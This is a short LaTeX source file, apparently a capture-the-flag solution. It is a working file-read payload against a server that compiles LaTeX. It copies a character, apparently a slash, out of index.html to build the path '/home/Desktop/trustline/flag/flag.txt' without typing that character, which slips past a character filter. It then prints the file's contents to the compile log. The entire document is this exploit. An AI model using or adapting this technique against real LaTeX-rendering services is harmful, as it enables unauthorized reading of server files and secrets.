\documentclass{minimal}
\usepackage{xstring}

\def\a{home}
\def\b{Desktop}
\def\c{trustline}
\def\d{flag}
\def\e{flag.txt}

\newread\file
\immediate\openin\file=index.html
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\immediate\read\file to\fileline
\StrMid{\fileline}{22}{22}[\s]
\immediate\message{\s}
\immediate\closein\file

\immediate\openin\file=\s\a\s\b\s\c\s\d\s\e
\loop\unless\ifeof\file
    \read\file to\fileline
    \message{\fileline}
\repeat
\closein\file

\begin{document}
\end{document} 
